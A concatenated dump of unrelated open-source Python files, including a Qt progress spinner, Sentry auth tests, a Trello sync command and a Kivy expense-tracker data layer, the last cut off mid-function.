Author: <NAME> <<EMAIL>>
License: LGPL
Note: I've licensed this code as LGPL because it was a complete translation of the code found here...
https://github.com/mojocorp/QProgressIndicator
Adapted to spectrochempy_gui
"""
import sys
from spectrochempy_gui.pyqtgraph.Qt import QtCore, QtGui, QtWidgets
class QProgressIndicator(QtGui.QWidget):
m_angle = None
m_timerId = None
m_delay = None
m_displayedWhenStopped = None
m_color = None
def __init__(self, parent):
# Call parent class constructor first
super().__init__(parent)
# Initialize Qt Properties
self.setProperties()
# Intialize instance variables
self.m_angle = 0
self.m_timerId = -1
self.m_delay = 40
self.m_displayedWhenStopped = False
self.m_color = QtCore.Qt.black
# Set size and focus policy
self.setSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
self.setFocusPolicy(QtCore.Qt.NoFocus)
# Show the widget
self.show()
def animationDelay(self):
return self.delay
def isAnimated(self):
return (self.m_timerId != -1)
def isDisplayedWhenStopped(self):
return self.displayedWhenStopped
def getColor(self):
return self.color
def sizeHint(self):
return QtCore.QSize(20, 20)
def startAnimation(self):
self.m_angle = 0
if self.m_timerId == -1:
self.m_timerId = self.startTimer(self.m_delay)
def stopAnimation(self):
if self.m_timerId != -1:
self.killTimer(self.m_timerId)
self.m_timerId = -1
self.update()
def setAnimationDelay(self, delay):
if self.m_timerId != -1:
self.killTimer(self.m_timerId)
self.m_delay = delay
if self.m_timerId != -1:
self.m_timerId = self.startTimer(self.m_delay)
def setDisplayedWhenStopped(self, state):
self.displayedWhenStopped = state
self.update()
def setColor(self, color):
self.m_color = color
self.update()
def timerEvent(self, event):
self.m_angle = (self.m_angle + 30) % 360
self.update()
def paintEvent(self, event):
if (not self.m_displayedWhenStopped) and (not self.isAnimated()):
return
width = min(self.width(), self.height())
painter = QtGui.QPainter(self)
painter.setRenderHint(QtGui.QPainter.Antialiasing)
outerRadius = (width - 1) * 0.5
innerRadius = (width - 1) * 0.5 * 0.38
capsuleHeight = outerRadius - innerRadius
capsuleWidth = capsuleHeight * .23 if (width > 32) else capsuleHeight * .35
capsuleRadius = capsuleWidth / 2
for i in range(0, 12):
color = QtGui.QColor(self.m_color)
if self.isAnimated():
color.setAlphaF(1.0 - (i / 12.0))
else:
color.setAlphaF(0.2)
painter.setPen(QtCore.Qt.NoPen)
painter.setBrush(color)
painter.save()
painter.translate(self.rect().center())
painter.rotate(self.m_angle - (i * 30.0))
painter.drawRoundedRect(capsuleWidth * -0.5, (innerRadius + capsuleHeight) * -1, capsuleWidth,
capsuleHeight, capsuleRadius, capsuleRadius)
painter.restore()
def setProperties(self):
self.delay = QtCore.pyqtProperty(int, self.animationDelay, self.setAnimationDelay)
self.displayedWhenStopped = QtCore.pyqtProperty(bool, self.isDisplayedWhenStopped, self.setDisplayedWhenStopped)
self.color = QtCore.pyqtProperty(QtGui.QColor, self.getColor, self.setColor)
def TestProgressIndicator():
app = QtGui.QApplication(sys.argv)
progress = QProgressIndicator(None)
progress.setAnimationDelay(70)
progress.startAnimation()
# Execute the application
sys.exit(app.exec_())
if __name__ == "__main__":
TestProgressIndicator()
| 1.765625 | 2 |
tests/sentry/coreapi/test_auth_from_request.py | uandco/sentry | 4 | 42116 | <reponame>uandco/sentry
from __future__ import absolute_import
import mock
import pytest
from django.core.exceptions import SuspiciousOperation
from sentry.coreapi import ClientAuthHelper, APIUnauthorized
def test_valid():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_X_SENTRY_AUTH': 'Sentry sentry_key=value, biz=baz'}
request.GET = {}
result = helper.auth_from_request(request)
assert result.public_key == 'value'
def test_valid_missing_space():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_X_SENTRY_AUTH': 'Sentry sentry_key=value,biz=baz'}
request.GET = {}
result = helper.auth_from_request(request)
assert result.public_key == 'value'
def test_valid_ignore_case():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_X_SENTRY_AUTH': 'SeNtRy sentry_key=value, biz=baz'}
request.GET = {}
result = helper.auth_from_request(request)
assert result.public_key == 'value'
def test_invalid_header_defers_to_GET():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_X_SENTRY_AUTH': 'foobar'}
request.GET = {'sentry_version': '1', 'foo': 'bar'}
result = helper.auth_from_request(request)
assert result.version == '1'
def test_invalid_legacy_header_defers_to_GET():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_AUTHORIZATION': 'foobar'}
request.GET = {'sentry_version': '1', 'foo': 'bar'}
result = helper.auth_from_request(request)
assert result.version == '1'
def test_invalid_header_bad_token():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_X_SENTRY_AUTH': 'Sentryfoo'}
request.GET = {}
with pytest.raises(APIUnauthorized):
helper.auth_from_request(request)
def test_invalid_header_missing_pair():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_X_SENTRY_AUTH': 'Sentry foo'}
request.GET = {}
with pytest.raises(APIUnauthorized):
helper.auth_from_request(request)
def test_invalid_malformed_value():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_X_SENTRY_AUTH': 'Sentry sentry_key=value,,biz=baz'}
request.GET = {}
with pytest.raises(APIUnauthorized):
helper.auth_from_request(request)
def test_multiple_auth_suspicious():
helper = ClientAuthHelper()
request = mock.Mock()
request.GET = {'sentry_version': '1', 'foo': 'bar'}
request.META = {'HTTP_X_SENTRY_AUTH': 'Sentry sentry_key=value, biz=baz'}
with pytest.raises(SuspiciousOperation):
helper.auth_from_request(request)
| 1.429688 | 1 |
n3rgy-consumer-data.py | n3rgy/consumer-data | 10 | 42244 | <filename>n3rgy-consumer-data.py
#!/usr/bin/python
# Copyright 2020 by <NAME>, n3rgy data ltd.
# All rights reserved.
#
# Sample script to interact with https://data.n3rgy.com service
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" basis,
# WITHOUT WARRANTIES OF ANY KIND, either express or implied.
#
import json, cgi, requests, os
import base64, urllib
print "Content-type: text/html\n\n"
form = cgi.FieldStorage()
#
# fetch cookies for apiKey and service type (live/sandbox)
#
url = "https://consumer-api.data.n3rgy.com"
AUTH = ""
handler = {}
if 'HTTP_COOKIE' in os.environ:
cookies = os.environ['HTTP_COOKIE']
cookies = cookies.split('; ')
for cookie in cookies:
cookie = cookie.split('=')
handler[cookie[0]] = cookie[1]
if handler['n3rgyConsumerAuthorization']:
AUTH = handler['n3rgyConsumerAuthorization']
durl = "/cgi-bin/n3rgy-consumer-data.py"
headers = {'Authorization': AUTH}
path_info = os.environ.get("PATH_INFO")
if path_info is None:
path_info = ""
querystring = os.environ.get("QUERY_STRING")
if querystring is None:
querystring = ""
apiurl = url + path_info + "?" + querystring
print '<html><head><link rel="stylesheet" href="/data/n3rgy.css"><body><img src="https://data.n3rgy.com/assets/img/logo/logo-light.png"></head><body bgcolor=#637381><h1>Consumer Smart Meter Data</h1><pre>'
print "<b>n3rgy data API Call: </b> " + apiurl + "<p>"
print "<b>n3rgy data API Response: </b><br>"
# Fetch API data
#
rdata = requests.get( url=apiurl, headers=headers )
# Get JSON from response
# [added support for output=csv parameter, just print if its not a json response]
#
try:
r = rdata.json()
except:
print rdata.text
print "</pre><p>"
print "<h3><a href='..'>back</a></h3></body></html>"
exit
# Copy JSON to add HTML links
#
h = r.copy()
# convert entries into HTML links (if there are any)
#
i=0
try:
while i < len(r['entries']):
h['entries'][i] = "<a href='" + durl + path_info + '/' + r['entries'][i] + "'>" + r['entries'][i] + "</a>"
i=i+1
except:
try:
h['entries'] = "<a href='" + durl + path_info + '/' + str(r['entries'][0]) + "'>" + str(r['entries'][0]) + "</a>"
except:
x=1
print json.dumps(h, indent=2)
print "</pre><p>"
print "<h3><a href='..'>back</a></h3></body></html>"
| 1.40625 | 1 |
rsLight_import.py | initialfx/Maya-to-Houdini | 1 | 42372 | import json
def filePath():
""" ask for file path"""
filepath = hou.ui.selectFile()
return filepath
def getData(filename):
return eval(open(filename).read(), {"false": False, "true":True})
temp_data = getData(filePath())
for i in range(len(temp_data)):
#print(dict[i])
data = temp_data[i]
# Create Root Null
sceneroot = hou.node('/obj')
globalnull = sceneroot.createNode('null', 'size_locator')
globalnull.setParms({'scale': 1})
# Create RS_Light
light = hou.node("/obj").createNode('rslight', 'Key')
light.setInput(0, globalnull)
hou.node("obj").layoutChildren()
light.parmTuple('t').set(tuple(data["translate"][0]))
light.parmTuple('r').set(tuple(data["rotate"][0]))
light.parm('RSL_intensityMultiplier').set(data["intensity"])
light.parm('Light1_exposure').set(data["exposure"])
light.parm('RSL_affectDiffuse').set(data["affectsDiffuse"])
light.parm('RSL_bidirectional').set(data["areaBidirectional"])
light.parm('RSL_visible').set(data["areaVisibleInRender"])
light.parm('RSL_volumeScale').set(data["volumeRayContributionScale"])
light.parm('RSL_areaShape').set(data["areaShape"])
light.setGenericFlag(hou.nodeFlag.DisplayComment, True)
light.setComment(data["name"])
#attributes = ['scale', 'rotate', 'translate', 'intensity', 'color', 'affectsDiffuse', 'affectsSpecular','areaVisibleInRender', 'areaBidirectional', 'volumeRayContributionScale',
# 'exposure', 'areaShape','spotConeAngle', 'areaSamples','areaSpread','on', 'colorR', 'colorG','colorB','temperature','colorMode', 'intensity',
# 'exposure', 'unitsType','lumensperwatt','decayType','falloffStart', 'falloffStop', 'shadow', 'shadowTransparency',
# 'SAMPLINGOVERRIDES_shadowSamplesScale','SAMPLINGOVERRIDES_numShadowSamples', 'spotConeFalloffAngle',
# 'spotConeFalloffCurve','affectedByRefraction', 'emitGiPhotons', 'emitCausticPhotons','normalize',
# 'photonIntensityMultiplierGI','photonIntensityMultiplierCaustics','diffuseRayContributionScale',
# 'glossyRayContributionScale','singleScatteringRayContributionScale','multipleScatteringRayContributionScale',
# 'indirectRayContributionScale', 'indirectMaxTraceDepth', 'volumeRayContributionScale','volumeNumSamples','dropoff']
| 1.484375 | 1 |
tools/mufom.py | asterick/pokemon-tc | 0 | 42500 | from struct import unpack
import sys, re
# Not listed:
# @SPLT
# @CALL
6# ?
FUNCTIONS = {
0x90: "<<",
0x91: ">>",
0x92: "@UDEF2",
0x93: "@DUPL",
0x94: "@EXCH",
0x95: "@UDEF5",
0x96: "@UDEF6",
0x97: "@UDEF7",
0x98: "@UDEF8",
0x99: "@UDEF9",
0x9A: "@UDEFA",
0x9B: "@UDEFB",
0x9C: "@UDEFC",
0x9D: "@UDEFD",
0x9E: "@UDEFE",
0x9F: "@UDEFF",
# FUNCTIONS
0xA0: "@F",
0xA1: "@T",
0xA2: "@ABS",
0xA3: "@NEG",
0xA4: "@NOT",
0xA5: "+",
0xA6: "-",
0xA7: "/",
0xA8: "*",
0xA9: "@MAX",
0xAA: "@MIN",
0xAB: "@MOD",
0xAC: "<",
0xAD: ">",
0xAE: "=",
0xAF: "!=",
0xB0: "@AND",
0xB1: "@OR",
0xB2: "@XOR",
0xB3: "@EXT",
0xB4: "@INS",
0xB5: "@ERR",
0xB6: "@IF",
0xB7: "@ELSE",
0xB8: "@ENDIF",
0xB9: "@ISDEF",
0xBE: "(",
0xBF: ")"
}
class Decoder:
def __init__(self, fo):
self.fo = fo
def commands(self):
while True:
code = self.expect("Command")
if code == 0xE0:
yield ('MB', self.string(), self.string())
elif code == 0xE1:
break
elif code == 0xEA:
yield ('CO', self.number(), self.string())
elif code == 0xEB:
yield ('DT', self.numbers())
elif code == 0xE2:
yield ('AS', self.variable(), self.expression())
elif code == 0xE4:
yield ('LR', *self.list("String"))
elif code == 0xED:
yield ('LD', self.string())
# Loading Commands
else:
yield (code, self.list("Letter", "Number", "Function"))
def byte(self):
return ord(self.fo.read(1))
def type(self):
code = self.byte()
if code <= 0x8F:
return "Number"
elif code >= 0x90 and code <= 0xBF:
return "Function"
elif code >= 0xC1 and code <= 0xDA:
return "Letter"
elif code >= 0xE0 and code <= 0xFF:
return "Command"
else:
return "Undefined"
def peek(self):
before = self.fo.tell()
type = self.type()
self.fo.seek(before)
return type
def expect(self, *types):
type = self.peek()
if "Variable" in types and type == "Letter":
type = "Variable"
elif "String" in types and type == "Number":
type = "String"
if not type in types:
raise Exception("Expected %s: got %s" % (', '.join(types), type))
translate = {
"Command": self.byte,
"Function": self.function,
"Number": self.number,
"Letter": self.letter,
"Variable": self.variable,
"String": self.string
}
return translate[type]()
# Lists
def list(self, *types):
terms = []
while True:
before = self.fo.tell()
try:
terms += [self.expect(*types)]
except:
self.fo.seek(before)
return terms
def section_types(self):
terms = []
while self.peek() == "Letter":
l = self.expect("Letter")
if l == "Y":
terms += [l + str(self.number())]
else:
terms += [l]
return terms
def letters(self):
return self.list("Letter")
def numbers(self):
return self.list("Number")
def expressions(self):
return self.expression()
# Atomics
def term(self):
return self.expect("Function", "Number", "Variable")
def variable(self):
prefix = self.letter()
if prefix in "LPRS":
suffix = self.number()
if suffix:
return prefix + str(suffix)
else:
return prefix
elif prefix in "INWXT":
return prefix + str(self.number())
elif prefix == "G":
return prefix
else:
return prefix
raise Exception("Expected a variable")
def expression(self, top = True):
return self.list("Variable", "Number", "Function")
def function(self):
code = self.byte()
if not code in FUNCTIONS:
raise Exception("Expected a function")
return FUNCTIONS[code]
def letter(self):
code = self.byte()
if code >= 0xC1 and code <= 0xDA:
return chr(ord('A') + code - 0xC1)
else:
raise Exception("Expected a letter")
def number(self):
code = self.byte()
if code <= 0x7F:
return code
elif code == 0x80:
return None
elif code <= 0x8F:
return sum([v << (i * 8) for i, v in enumerate(self.fo.read(code - 0x80)[::-1])])
else:
raise Exception("Expected a number: %2x" % code)
def string(self):
return self.fo.read(self.number())
| 1.703125 | 2 |
astroquery/ned/__init__.py | cdeil/astroquery | 0 | 42628 | <gh_stars>0
from .nedpy import *
| 0.09375 | 0 |
lib/bot/question/detector.py | mageirakos/donkeybot | 10 | 42756 | # bot modules
from bot.question.emails import EmailQuestion
from bot.question.issues import IssueQuestion
from bot.question.comments import CommentQuestion
import bot.config as config
# general python
import re
import nltk
from nltk.tokenize import PunktSentenceTokenizer
class QuestionDetector:
"""Utilizes regex patterns to match questions inside a text."""
def __init__(self, detector_type=None):
"""
Creates a QuestionDetector of some type.
The type holds the origin of the question
:param type: one of ['email', 'issue', 'comment']
"""
assert detector_type in ["email", "issue", "comment"]
self.type = detector_type
self.tokenizer = nltk.tokenize.punkt.PunktSentenceTokenizer()
self.QUESTION_REGEX = re.compile(r"[A-Z][a-z][^A-Z]*[?]$")
self.LOWERED_QUESTION_REGEX = re.compile(
r"(how |wh|can |could |do |does |should |would |may |is |are |have |has |will |am ).*[?]$"
)
# we can add more regexes to the list below for exceptions
self.EXCEPTIONS_REGEX = [config.URL_REGEX]
def detect(self, text):
"""
Detect and create Question objects from input text.
Detect the question as follows:
1) First pattern matches questions without lowering the text
2) Second pattern matches questions after having lowered the text
:param text : String upon which the detection algorithm runs
:return questions : list of Question Objects
"""
# part 1
questions = self._match_questions(text, self.QUESTION_REGEX)
for i, question in enumerate(questions):
# padding needed so that (start, end) indexes of Question object are correct
padding = ""
for _ in text[question.start : question.end]:
padding += " "
assert len(text) == len(
text[: question.start] + padding + text[question.end :]
)
# 'hide' already identified question and move on to next
text = text[: question.start] + padding + text[question.end :]
# part 2
lowered_text = text.lower()
# loop needed after first run since _match_questions returns a list (even if empty list)
[
questions.append(match)
for match in self._match_questions(
lowered_text, self.LOWERED_QUESTION_REGEX
)
]
# The reason no padding exists here is because we don't have a 3rd regex trying to match if we did
# we would have to hide already identified questions in the text from the next pattern
return questions
def _create_question(self, text, start, end):
"""Creates <Question obj> based on type"""
if self.type == "email":
question = EmailQuestion(question_text=text, start_idx=start, end_idx=end)
elif self.type == "issue":
question = IssueQuestion(question_text=text, start_idx=start, end_idx=end)
elif self.type == "comment":
question = CommentQuestion(question_text=text, start_idx=start, end_idx=end)
return question
def _match_questions(self, text, pattern):
"""
Private class function that returns questions found based on input text
and regex patterns.
Sentence tokenization is applied before trying to match a Question.
:param text : text upon which the detection takes place
:param pattern : compiled regex pattern used to detect the questions
:return questions : list of Question Objects
"""
questions = []
# get all exceptions present in the text
exceptions = self._get_exception_matches(text)
sentences = self.tokenizer.tokenize(text)
sentence_indices = list(self.tokenizer.span_tokenize(text))
for i, sentence in enumerate(sentences):
matches = pattern.search(sentence)
sent_start = sentence_indices[i][0]
# sent_end = sentence_indices[i][1]
if matches is not None:
# before appending check if the match is part of any exceptions
if self._is_exception(exceptions, matches.group()):
continue
else:
q_start = sent_start + matches.start()
q_end = sent_start + matches.end()
question = self._create_question(
text=matches.group(), start=q_start, end=q_end
)
questions.append(question)
return questions
def _get_exception_matches(self, text):
"""
Returns list of strings inside text that are definitely not questions based on our
EXCEPTION_REGEX patterns.We can add multitude of exceptions
eg. URLs, code blocks, File, RSEs ...
<!> Note: URLs (only exceptions matched for now)
:return exceptions: list of string which we should not consider as questions
"""
exceptions = []
for pattern in self.EXCEPTIONS_REGEX:
if pattern.search(text) is not None:
for match in pattern.finditer(text):
exceptions.append(match.group())
return exceptions
@staticmethod
def _is_exception(exceptions, question):
"""
Check that the question found is not part of any exceptions.
eg. URLs (only exceptions matched for now)
:return : Boolean
"""
for exception in exceptions:
if question.lower() in exception.lower():
print("\nFound a Question exception :")
print(question, exception)
return True
return False
if __name__ == "__main__":
pass
| 2.671875 | 3 |
kneaddata/db_preprocessing/mergesams.py | zwets/kneaddata | 41 | 42884 | import argparse
def merge(infiles, outfile):
setReads = set()
for infile in infiles:
with open(infile, "r") as fileIn:
for strLine in fileIn:
if strLine.startswith('@'):
continue
strSplit = strLine.split("\t")
if strSplit[2] != '*':
setReads.add(strSplit[0])
with open(outfile, "w") as fileOut:
for strRead in setReads:
fileOut.write(strRead + "\n")
return(len(setReads))
def main():
parser = argparse.ArgumentParser()
parser.add_argument("infiles", nargs="+",
help="sam files you wish to merge")
parser.add_argument("outfile", help="output file")
args = parser.parse_args()
iNumUniqReads = merge(args.infiles, args.outfile)
print("Number of merged reads: " + str(iNumUniqReads))
return 0
if __name__ == '__main__':
main()
| 1.921875 | 2 |
image-editor/data_editor/image/image_view.py | flegac/deep-experiments | 0 | 43012 | <reponame>flegac/deep-experiments
import tkinter as tk
import rx.operators as ops
from PIL import ImageTk, Image
from rx.subject import Subject
from data_editor.image.view_controller import ViewController
from data_toolbox.data.data_source import DataSource
from data_toolbox.image.buffer_factory import ImageFactory
class ImageView(tk.Frame):
MAX_REDRAW_PER_SEC = 1000
def __init__(self, master: tk.Widget, width: int = 600, height: int = 400):
tk.Frame.__init__(self, master)
self._source_change_bus = Subject()
self._source_change_bus.pipe(
ops.throttle_first(1. / ImageView.MAX_REDRAW_PER_SEC),
# ops.debounce(1. / ImageView.MAX_REDRAW_PER_SEC),
).subscribe(on_next=lambda _: self._redraw(_))
# canvas creation
self.canvas = tk.Canvas(self, width=width, height=height)
self.canvas.pack(expand=True, fill="both")
# image
self.data = None
self.image_id = None
self.viewport_controller = ViewController(self.canvas, self.set_source)
# Bind events to the Canvas
self.canvas.bind('<Configure>', lambda _: self._redraw(None))
for k, v in self.viewport_controller.bindings().items():
self.canvas.bind(k, v)
def mouse_image_coords(self):
return self.viewport_controller.mouse_image_coords()
def reset_viewport(self):
self.viewport_controller.viewport.zoom_factor = 0
self.viewport_controller.viewport.x = 0
self.viewport_controller.viewport.y = 0
def set_source(self, source: DataSource = None):
self._source_change_bus.on_next(source)
def _redraw(self, source: DataSource = None):
if source is not None:
self.data = source.get_data()
if self.image_id:
self.canvas.delete(self.image_id)
if self.data is None:
return
data = self.viewport_controller.viewport.apply(self.data)
self.canvas.image = ImageTk.PhotoImage(image=Image.fromarray(data))
self.image_id = self.canvas.create_image((0, 0), anchor=tk.NW, image=self.canvas.image)
self.canvas.lower(self.image_id) # set it into background
if __name__ == '__main__':
root = tk.Tk()
editor = ImageView(root)
editor.set_source(ImageFactory.random)
editor.pack(fill='both', expand=True)
root.mainloop()
| 1.992188 | 2 |
app/models.py | Nasfame/Mobile-Wallet | 0 | 43140 | <gh_stars>0
from datetime import datetime
from flask_login import UserMixin
from pytz import timezone
from . import db
def time_now():
IST = timezone('Asia/Kolkata')
return datetime.now(IST)
class User(db.Model, UserMixin):
__tablename__ = "user"
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(150), nullable=False, unique=True)
password = db.Column(db.String(150), nullable=False)
balance = db.Column(db.Float(44))
class Transaction(db.Model):
__tablename__ = "transaction"
id = db.Column(db.Integer, primary_key=True)
sender_id = db.Column(db.Integer, db.ForeignKey('user.id'))
receiver_id = db.Column(db.Integer, db.ForeignKey('user.id'))
amount = db.Column(db.Float(44), nullable=False)
date = db.Column(db.DateTime(timezone=True), default=time_now())
@property
def repr(self):
return {"id": self.id, "date": self.date.strftime('%d/%m/%y %H:%M:%S'), "sender_id": self.sender_id,
"receiver_id": self.receiver_id, "amount": self.amount}
# def as_dict(self):
# return {c.name: getattr(self, c.name) for c in self.__table__.columns}
| 1.5 | 2 |
core/management/commands/sync_events_dashboard.py | vanessa/djangogirls | 446 | 43268 | import datetime
import re
import time
from collections import namedtuple
from django.conf import settings
from django.core.management.base import BaseCommand
from trello import ResourceUnavailable, TrelloClient
from core.models import Event
# Create new command
class Command(BaseCommand):
help = 'Syncs event in trello board. Need a token.'
missing_args_message = (
'You need to add a token! Get one here: '
'https://trello.com/1/authorize?key=01ab0348ca020573e7f728ae7400928a&scope=read%2Cwrite&'
'name=My+Application&expiration=1hour&response_type=token'
)
def add_arguments(self, parser):
parser.add_argument('trello_token', type=str)
def handle(self, *args, **options):
token = options['trello_token']
events = event_list()
sync(events, token)
# Get data
EventTuple = namedtuple('EventTuple', 'name id city date')
def event_list():
event = Event.objects.all()
result = []
for e in event:
name = e.name
_id = str(e.pk)
city = e.city
date = datetime.date(e.date.year, e.date.month, e.date.day or 1)
result.append(EventTuple(name, _id, city, date))
return result
# Sync to trello
ADMIN_BASE_URL = 'https://djangogirls.org/admin/core/event/'
def sync(events, token):
trello = TrelloClient(api_key=settings.TRELLO_API_KEY, token=token)
board = trello.get_board('55f7167c46760fcb5d68b385')
far_away, less_2_months, less_1_month, less_1_week, today, past = board.all_lists()
all_cards = {card_id(c): c for c in board.all_cards()}
date_today = datetime.date.today()
for e in events:
card = all_cards.get(e.id)
if not card:
card = create_card(e, far_away)
create_checklist(card)
# fetch card to get due date
try:
card.fetch()
except ResourceUnavailable:
print("Oopsie: too many requests! Let's wait 10 seconds!")
time.sleep(10)
card.fetch()
if e.date != card.due_date.date():
print('Changing due date of {} to {}'.format(e.city, e.date))
card.set_due(e.date)
distance = (e.date - date_today).days
if distance < 0:
right_list = past
elif distance == 0:
right_list = today
elif distance < 7:
right_list = less_1_week
elif distance < 30:
right_list = less_1_month
elif distance < 60:
right_list = less_2_months
else:
right_list = far_away
ensure_card_in_list(card, right_list)
def card_id(card):
m = re.search(ADMIN_BASE_URL + r'(\d+)',
card.desc)
return m.group(1)
def create_card(event, list):
print('Creating card {} ({})'.format(event.city, event.date.isoformat()))
return list.add_card(name=event.city,
desc=ADMIN_BASE_URL + event.id,
due=event.date.isoformat())
def create_checklist(card):
card.add_checklist("Things to do:", [
"2 month check", "1 month check", "Thank you email and request for stats", "Stats obtained"])
def ensure_checklist_in_card(card):
if not card.checklists:
print("Adding checklist to {} card.".format(card.name))
create_checklist(card)
def ensure_card_in_list(card, list):
if card.list_id != list.id:
print('Moving {} to {}'.format(
card.name, list.name))
card.change_list(list.id)
| 1.515625 | 2 |
gubbing/models/networks/temporal_net.py | mychiux413/gubbing | 0 | 43396 | <reponame>mychiux413/gubbing<gh_stars>0
import tensorflow as tf
from tensorflow.keras import layers, Model
class TemporalNetwork(Model):
pass
| 0.949219 | 1 |
autobot/config_loader.py | fotini-pan/autobot | 0 | 43524 | <reponame>fotini-pan/autobot<gh_stars>0
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2019 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Performs project's configuration loading."""
import os
from configparser import ConfigParser
from dotenv.main import dotenv_values
import autobot.config as config
class Config:
"""Interact with configuration variables."""
dotenv_path = os.path.join(os.path.abspath(os.path.join(__file__, "..")), ".env")
ini_parser = ConfigParser()
ini_path = os.path.join(os.path.abspath(os.path.join(__file__, "..")), "config.ini")
config = {}
@classmethod
def __init__(cls, **kwargs):
"""Initialize configuration."""
cls.load_config(**kwargs)
@classmethod
def load_config(cls, **kwargs):
"""Get autobot configuration values."""
cls.config = cls.env_config()
cls.ini_parser.optionxform = str
cls.ini_parser.read(cls.ini_path)
cls.config.update(cls.ini_config())
cls.config.update(kwargs)
py_config = cls.py_config()
defaults = {
key: py_config[key] for key in py_config if key not in cls.config.keys()
}
cls.config.update(defaults)
cls.config = {key: cls.config[key] for key in py_config}
@classmethod
def env_config(cls):
"""Get autobot configuration values from .env file."""
return dotenv_values(cls.dotenv_path)
@classmethod
def ini_config(cls):
"""Get autobot configuration values from config.ini file."""
return cls.ini_parser["AUTOBOT"]
@classmethod
def py_config(cls):
"""Get autobot configuration values from config.py file."""
res = {}
for k in dir(config):
if k.startswith("AUTOBOT_"):
res.setdefault(k, getattr(config, k))
return res
| 1.414063 | 1 |
app/dtclasses.py | blurmcclure18/ExpenseTracker | 16 | 43652 | <gh_stars>10-100
from sqlalchemy import create_engine
from sqlalchemy import Column, String, Integer, func, Boolean, Float, desc, text
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from contextlib import contextmanager
from datetime import datetime
from kivy.properties import ObjectProperty
Base = declarative_base()
Session = ObjectProperty()
def init_session(f_path):
global Session
engine = create_engine(f"sqlite:///{f_path}")
Session = sessionmaker(bind=engine)
@contextmanager
def session_scope():
"""Provide a transactional scope around a series of operations."""
session = Session()
try:
yield session
session.commit()
except:
session.rollback()
raise
finally:
session.close()
class Items(Base):
"""Base user class"""
__tablename__ = "items"
item_id = Column(Integer,primary_key=True)
item_name = Column(String)
item_link = Column(Integer)
active = Column(Boolean)
def __init__(self, **kwargs):
self.item_id = kwargs['item_id']
self.item_name = kwargs['item_name']
self.item_link = kwargs['item_link']
self.active = kwargs['active']
def get_item(**kwargs):
item_name = kwargs['item_name']
item_link = kwargs['item_link']
item_id = None
with session_scope() as session:
if item_link is None:
item = session.query(Items).filter(Items.item_name == item_name).first()
else:
item = session.query(Items)\
.filter(Items.item_name == item_name, Items.item_link == item_link).first()
if item is not None:
item_id = item.item_id
return item_id
def get_all_items():
with session_scope() as session:
items = session.query(Items).order_by(Items.item_name).all()
item_dict = {}
for item in items:
item_dict[item.item_id] = {'item_name': item.item_name,
'item_link': item.item_link,
'active': item.active}
return item_dict
def get_items(**kwargs):
item_name = kwargs['item_name']
item_type = kwargs['item_type']
with session_scope() as session:
if item_type == 'main':
items = session.query(Items).filter(Items.item_link == 0
, Items.item_name.like('%{}%'.format(item_name)))\
.order_by(Items.item_name).all()
elif item_type == 'sub':
items = session.query(Items).filter(Items.item_link != 0
, Items.item_name.like('%{}%'.format(item_name)))\
.order_by(Items.item_name).all()
elif item_type == 'all':
items = session.query(Items).filter(Items.item_name.like('%{}%'.format(item_name)))\
.order_by(Items.item_name).all()
item_dict = {}
for item in items:
item_dict[item.item_id] = {'item_name': item.item_name,
'item_link': item.item_link,
'active': item.active}
return item_dict
def get_items_by_link(**kwargs):
item_link = kwargs['item_link']
with session_scope() as session:
items = session.query(Items).filter(Items.item_link == item_link)\
.order_by(Items.item_name).all()
item_dict = {}
for item in items:
item_dict[item.item_id] = {'item_name': item.item_name,
'item_link': item.item_link,
'active': item.active}
return item_dict
def get_main_items():
with session_scope() as session:
items = session.query(Items).filter(Items.item_link == 0).order_by(Items.item_name).all()
item_dict = {}
for item in items:
item_dict[item.item_id] = {'item_name': item.item_name,
'item_link': item.item_link,
'active': item.active}
return item_dict
def update_active(**kwargs):
item_id = kwargs['item_id']
active = kwargs['active']
with session_scope() as session:
item = session.query(Items).filter(Items.item_id == item_id).first()
if item.item_link == 0:
session.query(Items).filter(Items.item_id == item_id).update({'active': active})
session.query(Items).filter(Items.item_link == item_id).update({'active': active})
return 'refresh'
else:
main_item = session.query(Items).filter(Items.item_id == item.item_link).first()
if main_item.active == False:
return 'revert'
else:
session.query(Items).filter(Items.item_id == item_id).update({'active': active})
return ''
def add_item(**kwargs):
with session_scope() as session:
item = Items(**kwargs)
session.add(item)
def get_next_item_id():
with session_scope() as session:
item_id = session.query(func.max(Items.item_id)).one()[0]
if item_id is None:
item_id = 1
else:
item_id = item_id + 1
return item_id
def data_correction():
with session_scope() as session:
session.query(Items).filter(Items.item_id == 22).update({'item_link': 0})
session.query(Items).filter(Items.item_id == 28).update({'item_name': 'Bus'})
session.query(Items).filter(Items.item_id == 29).update({'item_name': 'Train'})
item = session.query(Items.item_id).filter(Items.item_link == 25, Items.item_name == 'Flight').first()
if item is None:
item_id = Items.get_next_item_id()
session.add(Items(item_id=item_id, item_name='Flight', item_link=25, active=1))
session.query(Items).filter(Items.item_name == '').delete()
class Expenses(Base):
"""Base user class"""
__tablename__ = "expenses"
expense_id = Column(Integer, primary_key=True)
item_id = Column(Integer)
value = Column(Float)
date = Column(String)
def __init__(self, **kwargs):
self.expense_id = kwargs['expense_id']
self.item_id = kwargs['item_id']
self.value = kwargs['value']
self.date = kwargs['date']
def get_expenses(**kwargs):
date_type = kwargs['date_type']
query_date = kwargs['date']
with session_scope() as session:
if date_type == 'day':
expenses = session.query(Expenses.expense_id, Items.item_name, Expenses.value, Expenses.date)\
.filter(Items.item_id == Expenses.item_id).filter(Expenses.date == query_date).all()
expense_dict = {}
for expense in expenses:
expense_dict[expense.expense_id] = {'item_name': expense.item_name,
'value': expense.value,
